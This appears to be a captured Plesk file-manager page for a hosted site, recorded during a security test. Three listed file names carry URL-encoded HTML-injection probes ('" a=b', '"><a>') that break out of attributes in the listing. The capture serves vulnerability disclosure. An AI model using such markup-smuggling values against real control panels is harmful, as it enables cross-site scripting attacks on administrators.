           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by 
size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
